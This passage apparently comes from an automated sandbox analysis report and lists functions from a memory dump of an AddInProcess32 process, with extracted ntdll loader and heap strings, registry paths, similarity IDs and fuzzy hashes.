            • Instruction Fuzzy Hash: A23135B1210101EFDB51DB9CC8C9F6677E9EF05BA0F180169F909EB290E670EE40CB65
            Function 018C245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
            Download Yara Rule
            Strings
            • minkernel\ntdll\ldrinit.c, xrefs: 0190A9A2
            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0190A992
            • apphelp.dll, xrefs: 018C2462
            • LdrpDynamicShimModule, xrefs: 0190A998
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
            • API String ID: 0-176724104
            • Opcode ID: 7a7be5ba7d598aec93510ea7408a45669673113ba56170de583eb9a4b33e29df
            • Instruction ID: fea34aded3dc054304dc9d67ba5ddfb0a3cb2a299ce246aba42641e8b53bc19e
            • Opcode Fuzzy Hash: 7a7be5ba7d598aec93510ea7408a45669673113ba56170de583eb9a4b33e29df
            • Instruction Fuzzy Hash: D1311671600301AFDB329F6E9985AAAB7BAFB84B04F15001DE915AB295D7709A82C7C1
            Function 01899148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
            • API String ID: 0-1391187441
            • Opcode ID: 58845a623cdb99437e321ebe7fd6b0430ae9bbe89c02de3db2c7caf834a693b2
            • Instruction ID: 93517ad08dc163615c39963c18810ef03043b2eb50a87504ca0b89b78de5730b
            • Opcode Fuzzy Hash: 58845a623cdb99437e321ebe7fd6b0430ae9bbe89c02de3db2c7caf834a693b2
            • Instruction Fuzzy Hash: 6531C172A10109EFCF01DB49C888FAAB7B8FF45B24F184059E914E7291E774EF40CA61
            Function 018B29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
            Download Yara Rule
            Strings
            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 018B327D
            • HEAP: , xrefs: 018B3264
            • HEAP[%wZ]: , xrefs: 018B3255
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
            • API String ID: 0-617086771
            • Opcode ID: c182d90503ddb526965b4192b14cf6be2c31b07de05fedbb004c4cbc1eccb6c2
            • Instruction ID: 2dfcd1b6aa9884f62059e0911041606a790f74ffcd958683cda4e60590c18718
            • Opcode Fuzzy Hash: c182d90503ddb526965b4192b14cf6be2c31b07de05fedbb004c4cbc1eccb6c2
            • Instruction Fuzzy Hash: AD92AB71A046499FDB25CF68C484BEEBBF2FF49304F188069E859EB352D734AA45CB50
            Function 018B1F92 Relevance: 4.3, Strings: 3, Instructions: 563COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
            • API String ID: 0-3178619729
            • Opcode ID: 3f06294ff29e8e9aa48602d2dad024109ed4e7225ab32edd49d93b840d6e5fd6
            • Instruction ID: 563cda6e0b6d910992514146be0a7f279ebf6877fbd527e781b49a50e37759d7
            • Opcode Fuzzy Hash: 3f06294ff29e8e9aa48602d2dad024109ed4e7225ab32edd49d93b840d6e5fd6
            • Instruction Fuzzy Hash: 7B220270600646AFEB16CF28C494BBABBFAFF05704F188459E549CB392D735E982CB50
            Function 019494E0 Relevance: 4.3, Strings: 3, Instructions: 558COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: $ $0
            • API String ID: 0-3352262554
            • Opcode ID: b632697dfaa99e3c49640798474c0008387e98928b87a79ca0de41a48b6e63f6
            • Instruction ID: 7d823ad15b7a15b15dd72e6ccb714444cec43b652451257bfef3baf2d12faf52
            • Opcode Fuzzy Hash: b632697dfaa99e3c49640798474c0008387e98928b87a79ca0de41a48b6e63f6
            • Instruction Fuzzy Hash: 9A3202B1A083818FE720CF68C884B5BBBE5BB88348F04492EF599C7351D775E948CB56
            Function 018B0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
            • API String ID: 0-4253913091
            • Opcode ID: b93bbfaa91de3bd1843d033862363ea4c74ec2e3b199da52763456bf63995c9c
            • Instruction ID: 78586f90bb78ff0ad94d4c79a3e418eed1514cf371bd00f725f9bff4a5894c75
            • Opcode Fuzzy Hash: b93bbfaa91de3bd1843d033862363ea4c74ec2e3b199da52763456bf63995c9c
            • Instruction Fuzzy Hash: CEF19C70600606DFEB26CF68C894BAABBB5FF44704F148168E51ADB391D734EA81CF91
            Function 018A1460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
            Download Yara Rule
            Strings
            • HEAP: , xrefs: 018A1596
            • HEAP[%wZ]: , xrefs: 018A1712
            • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 018A1728
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
            • API String ID: 0-3178619729
            • Opcode ID: 7d8ad0a28963ce69ade089dc605f28f490728e4310713d42435705f8ffa7500c
            • Instruction ID: 0f2af7fffff6c87ef1e86cc46e1aca35b676e3e0ca26d2af444e166743899792
            • Opcode Fuzzy Hash: 7d8ad0a28963ce69ade089dc605f28f490728e4310713d42435705f8ffa7500c
            • Instruction Fuzzy Hash: 02E1E131A046459FEB29CF6CC499B7ABBF1AF48304F58845DE6D6CB246E734EA40CB50
            Function 018C6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: $@
            • API String ID: 0-1077428164
            • Opcode ID: 8a02b5c790d61554cbfa23512efd50b0c202bc9792b2d8d8a4ea34e6a0e9e600
            • Instruction ID: 66ad1636d0972d21b81ce5bd7115af4dd0c1dd7f06dd537218068f184b7f5aac
            • Opcode Fuzzy Hash: 8a02b5c790d61554cbfa23512efd50b0c202bc9792b2d8d8a4ea34e6a0e9e600
            • Instruction Fuzzy Hash: D5C27F716083459FE726CF28C881BABBBE5AF88B14F04896DF989C7241D734DA45CF52
            Function 0189A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: FilterFullPath$UseFilter$\??\
            • API String ID: 0-2779062949
            • Opcode ID: a0e1e78c0bec3613669d2eba18e3c1aa09ee3922c43c6c1b379540237180822d
            • Instruction ID: acf31714e33dafd151f89c5de2e6433cde615344ce46f822c8d6cf3fb11479e5
            • Opcode Fuzzy Hash: a0e1e78c0bec3613669d2eba18e3c1aa09ee3922c43c6c1b379540237180822d
            • Instruction Fuzzy Hash: 5AA157719116299BDF319B68CC88BAAB7B8EF44704F1001EAEA09E7251E7359F84CF51
            Function 018AB440 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
            • API String ID: 0-373624363
            • Opcode ID: 54f9c9e42441acf8aee5a8483da0a8c78c2553387fdcd1489bc7dc3b7ce0ac1e
            • Instruction ID: a5a457f5f0301447af2aa1095d786e56c17fa6c24c3690660128674fdf2aaf78
            • Opcode Fuzzy Hash: 54f9c9e42441acf8aee5a8483da0a8c78c2553387fdcd1489bc7dc3b7ce0ac1e
            • Instruction Fuzzy Hash: AB91DF71A00209CFEB26CF58C490BAE7BB4FF01714F588199E955EB2D0D3789B80CB91
            Function 018D909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: %$&$@
            • API String ID: 0-1537733988
            • Opcode ID: 0689f1b2ca74a6e615e19af87da74176ebe934593fcfc018be2b932613b70a3b
            • Instruction ID: 5585b45d0f22bd30541a0a8e3405c840f28a30bfb30fd3ad1c775bab49bc405a
            • Opcode Fuzzy Hash: 0689f1b2ca74a6e615e19af87da74176ebe934593fcfc018be2b932613b70a3b
            • Instruction Fuzzy Hash: 8A71CF70A083069FDB15DF28C580A2BBBE9BFC571CF108A1DE5AAD7251C730DA45CB92
            Function 018C15F4 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
            Download Yara Rule
            Strings
            • minkernel\ntdll\ldrmap.c, xrefs: 0190A59A
            • Could not validate the crypto signature for DLL %wZ, xrefs: 0190A589
            • LdrpCompleteMapModule, xrefs: 0190A590
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
            • API String ID: 0-1676968949
            • Opcode ID: 8e5a9fabbefde3256c52cb3a1b4b0f4ea1349f8709a91822a0043c5205c40971
            • Instruction ID: e99d16818dc942256970851596d5149b72603cc200e69758cf9d14bb3afc7ec8
            • Opcode Fuzzy Hash: 8e5a9fabbefde3256c52cb3a1b4b0f4ea1349f8709a91822a0043c5205c40971
            • Instruction Fuzzy Hash: F551E170600745DFE722DA6CC988F1A7BE8BB00B18F180559FA55DB6E2D774EA40C780
            Function 0194DAAC Relevance: 3.9, Strings: 3, Instructions: 163COMMON
            Download Yara Rule
            Strings
            • Heap block at %p modified at %p past requested size of %Ix, xrefs: 0194DC32
            • HEAP: , xrefs: 0194DC1F
            • HEAP[%wZ]: , xrefs: 0194DC12
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
            • API String ID: 0-3815128232
            • Opcode ID: 05f732211fa84f974ff680c0ac09e402ad5961fa08e0ea25b03f5fc906b6db19
            • Instruction ID: fd9f1bfb0a8a8e0fadb91c677bd39489848d4c68702f2356cd8e1757abd2df47
            • Opcode Fuzzy Hash: 05f732211fa84f974ff680c0ac09e402ad5961fa08e0ea25b03f5fc906b6db19
            • Instruction Fuzzy Hash: 0151443D1142108BE765CBAEC888F7277E6DF66646F048C5AE4CACB681D275D803DB21
            Function 0189758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
            • API String ID: 0-1151232445
            • Opcode ID: e78f1745a5ff67b7c3c2e3dd9b51965416c880cbfc999b90279553b5581e5a5b
            • Instruction ID: 9bf7b007eb2ee465197cc39bd482eb2697a0595391b27de0ed95a0e7fd5f3f6c
            • Opcode Fuzzy Hash: e78f1745a5ff67b7c3c2e3dd9b51965416c880cbfc999b90279553b5581e5a5b
            • Instruction Fuzzy Hash: AB41E5703202808FEF2ACA5DC0C4B7A7B90DF41764F2C446DD64ACF296D664DA86CBA1
            Function 0195C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
            Download Yara Rule
            Strings
            • @, xrefs: 0195C1F1
            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0195C1C5
            • PreferredUILanguages, xrefs: 0195C212
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
            • API String ID: 0-2968386058
            • Opcode ID: cdd81b202773c0541de7707ab102484f07a3558c3b05de93a62251d0fa12ef48
            • Instruction ID: c71678d878d4f97ecd0e93d32c26c4ee801c1dec55e5fab745418069fde68e05
            • Opcode Fuzzy Hash: cdd81b202773c0541de7707ab102484f07a3558c3b05de93a62251d0fa12ef48
            • Instruction Fuzzy Hash: 43417171E00309EBDF51DAD8C891FEEBBBCAB14745F04416AEA09F7240D774DA448B91
            Function 01934144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
            • API String ID: 0-1373925480
            • Opcode ID: ddd8321d192891a50beea8390fac47403806f015fdefe6feebdeebd6f5b5a5cc
            • Instruction ID: 18d88def2e0b98f458229ab2ac4cee553ab347ae4b3b5eb101da34bc9309c01a
            • Opcode Fuzzy Hash: ddd8321d192891a50beea8390fac47403806f015fdefe6feebdeebd6f5b5a5cc
            • Instruction Fuzzy Hash: 1341F331A00659CBEB25DBD8C884BADBBB9FFA5340F16045AD909FB791D7348A01CB51
            Function 018D33A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
            Download Yara Rule
            Strings
            • RtlCreateActivationContext, xrefs: 019129F9
            • SXS: %s() passed the empty activation context data, xrefs: 019129FE
            • Actx , xrefs: 018D33AC
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
            • API String ID: 0-859632880
            • Opcode ID: bec74b8ca3ec7e19446a774d13444f9741fb9717ca40c401266d099bd372adb1
            • Instruction ID: 637d4d79670505503a8c32cf83eb71680453a591c41a36bf022688cfe8c9cd1b
            • Opcode Fuzzy Hash: bec74b8ca3ec7e19446a774d13444f9741fb9717ca40c401266d099bd372adb1
            • Instruction Fuzzy Hash: AA3124732003099FEB26EF58C8C0B967BA9BB54714F158429EE09DF285CB34EA41C7A1
            Function 0192B594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
            Download Yara Rule
            Strings
            • @, xrefs: 0192B670
            • GlobalFlag, xrefs: 0192B68F
            • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0192B632
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
            • API String ID: 0-4192008846
            • Opcode ID: 671804be46f94a2501c52d41dab608aa1ef320bb0c02e7123916f77297f71202
            • Instruction ID: 6ff7d2d78b45654646ff4c6c0a18dd3e478348606231d4e97d5e516286fd89d3
            • Opcode Fuzzy Hash: 671804be46f94a2501c52d41dab608aa1ef320bb0c02e7123916f77297f71202
            • Instruction Fuzzy Hash: AA313EB1A00219AFDB10EF99CC84AEEBBBDEF44754F140469E609E7254D7749B00CBA4
            Function 018E1270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
            Download Yara Rule
            Strings
            • @, xrefs: 018E12A5
            • BuildLabEx, xrefs: 018E130F
            • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 018E127B
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
            • API String ID: 0-3051831665
            • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
            • Instruction ID: 9694381b248ea098e0deb108381b2abc3feeab2b327ca851b5f530e8a63787a0
            • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
            • Instruction Fuzzy Hash: B6319C7290061DEBDB11EB99CC48EEEBBFDEB95714F004025EA14E7260D734DB058BA1
            Function 019220DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
            Download Yara Rule
            Strings
            • minkernel\ntdll\ldrinit.c, xrefs: 01922104
            • Process initialization failed with status 0x%08lx, xrefs: 019220F3
            • LdrpInitializationFailure, xrefs: 019220FA
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
            • API String ID: 0-2986994758
            • Opcode ID: d361e852e0f7d0f92592e8e6dd7684bbcde25024c5e523cc18186fd9cfefe9ec
            • Instruction ID: 75030175b4acc8d158330a2d7623fce747cc098f894bae742c645c20dad02150
            • Opcode Fuzzy Hash: d361e852e0f7d0f92592e8e6dd7684bbcde25024c5e523cc18186fd9cfefe9ec
            • Instruction Fuzzy Hash: 0EF0C8756403186BEB24EB5CCC46F99376DFB41B54F200059F604A738AD6B4AA40C651
            Function 018B03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID: ___swprintf_l
            • String ID: #%u
            • API String ID: 48624451-232158463
            • Opcode ID: e9d21ff851c3e1790eaed20998b7c005fe371aa0f735f3691f29157a0368cd28
            • Instruction ID: c1dbdd94cb578ce48c7ce999e893dad8bd2f292fc3ff0f776d62b1074e7ef8a1
            • Opcode Fuzzy Hash: e9d21ff851c3e1790eaed20998b7c005fe371aa0f735f3691f29157a0368cd28
            • Instruction Fuzzy Hash: 50712C71A0014A9FDB01DF98C994BEEBBF8BF58704F144065EA05E7251EA38EE41CB61
            Function 018B52A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: @$@
            • API String ID: 0-149943524
            • Opcode ID: 1ce779bbf879b39762c5e5084350e3fd70acb775c442cf0388fe53d4d91b44d9
            • Instruction ID: 5f3f31792cb6119ef99c091b6b018c6b0948ae6e69b7384fd63a20deeca364af
            • Opcode Fuzzy Hash: 1ce779bbf879b39762c5e5084350e3fd70acb775c442cf0388fe53d4d91b44d9
            • Instruction Fuzzy Hash: 1B327B705083128FD7258F18C4D0BBEBBE5AF89744F14492EEA95CB3A0E734DA94CB52
            Function 018A2FC8 Relevance: 2.9, Strings: 2, Instructions: 410COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: @4Cw@4Cw$PATH
            • API String ID: 0-1794901795
            • Opcode ID: 4dde9c8e97be0d8c0a98c73ceca69728a269cde57ebf0669d6dd09cb868aa37c
            • Instruction ID: 15ba01270ab98c3d1d4992eec076df5b860564e402d2802101dd59335df07c4d
            • Opcode Fuzzy Hash: 4dde9c8e97be0d8c0a98c73ceca69728a269cde57ebf0669d6dd09cb868aa37c
            • Instruction Fuzzy Hash: 38F19C71D042199BEB25CF9DE881ABEBBF1FF48700F854029E945EB344D734AA41CBA1
            Function 0196A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: `$`
            • API String ID: 0-197956300
            • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
            • Instruction ID: ec857345355833c38e8cd5c36becc522115eaebf1930a80384a9506792d36e2f
            • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
            • Instruction Fuzzy Hash: 1DC1E3312043429BE725CF28C841B6BBBE9BFD4719F084A2DF69ADB290D774D905CB61
            Function 018A0CF2 Relevance: 2.8, Strings: 2, Instructions: 317COMMON
            Download Yara Rule
            Strings
            • Failed to retrieve service checksum., xrefs: 018FEE56
            • ResIdCount less than 2., xrefs: 018FEEC9
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
            • API String ID: 0-863616075
            • Opcode ID: 0156ca8e2da62a59433c4e0c1f05e94fb04ce50df5d9f3f1525fd97af082b535
            • Instruction ID: 5db8410b5a431785e12ab693f5d2cc38b055b3f24ec78d1b575f07ba4e6f7fea
            • Opcode Fuzzy Hash: 0156ca8e2da62a59433c4e0c1f05e94fb04ce50df5d9f3f1525fd97af082b535
            • Instruction Fuzzy Hash: 1CE1E3B19087449FE364CF19C441BABBBE0BB88314F408A2EE699DB351D7719609CF96
            Function 018A04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
            Download Yara Rule
            Strings
            • kLsE, xrefs: 018A0540
            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 018A063D
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
            • API String ID: 0-2547482624
            • Opcode ID: 09685ce6024e0a72fd4d761000a95b5e80e1c7e595a2d95a8b89c9d34aade36c
            • Instruction ID: 6d5e0e63b87f4d924dda64b849ed904185153c90bca6e08c7e04d0add4ea627c
            • Opcode Fuzzy Hash: 09685ce6024e0a72fd4d761000a95b5e80e1c7e595a2d95a8b89c9d34aade36c
            • Instruction Fuzzy Hash: 8851D0715047468FE724EF68C4806A7BBE4AF85308F50483EFAEAC7241E770E645CB92
            Function 018AA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
            Download Yara Rule
            Strings
            • RtlpResUltimateFallbackInfo Enter, xrefs: 018AA2FB
            • RtlpResUltimateFallbackInfo Exit, xrefs: 018AA309
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
            • API String ID: 0-2876891731
            • Opcode ID: 27250b2a8a86207b339ccc28f2ad38b3c056458f832becfa7f980f51a9a2857b
            • Instruction ID: 68e6f9671378c838e10c7353699b2643585670a36856734bfaa7afcb3e938dc3
            • Opcode Fuzzy Hash: 27250b2a8a86207b339ccc28f2ad38b3c056458f832becfa7f980f51a9a2857b
            • Instruction Fuzzy Hash: 8C41B030A04659DFEB16CF5DC844BAEBBB8FF85704F1440A5E904DB691E3B5DA40CB51
            Function 019335BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
            • API String ID: 0-118005554
            • Opcode ID: 714a333bdebf0f1c5b5cee07e12d1776a109652ef1d54d22365c9d96fbcf93fd
            • Instruction ID: 4f63460529b8b604b5adb557368f4e1384ca33a260af34a289415f75befe0a82
            • Opcode Fuzzy Hash: 714a333bdebf0f1c5b5cee07e12d1776a109652ef1d54d22365c9d96fbcf93fd
            • Instruction Fuzzy Hash: C9318D312487429FE311DF6DD885B1AB7E8BFD5718F080869F958CB390E634DA45CB92
            Function 018D329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: .Local\$@
            • API String ID: 0-380025441
            • Opcode ID: ca6e9f152f8812e34befd6bb684b92f1096819b4cf03b86a8df503dc27c6cd27
            • Instruction ID: 26d708321d690e6979cb1d2322b15773e81189e747e9312058beda0c9057f50f
            • Opcode Fuzzy Hash: ca6e9f152f8812e34befd6bb684b92f1096819b4cf03b86a8df503dc27c6cd27
            • Instruction Fuzzy Hash: CF3169B2508305AFD325DF28D980A6BBBE8FB85754F44092EF995C3211DA30DE048B93
            Function 018D34B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
            Download Yara Rule
            Strings
            • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 01912A95
            • RtlpInitializeAssemblyStorageMap, xrefs: 01912A90
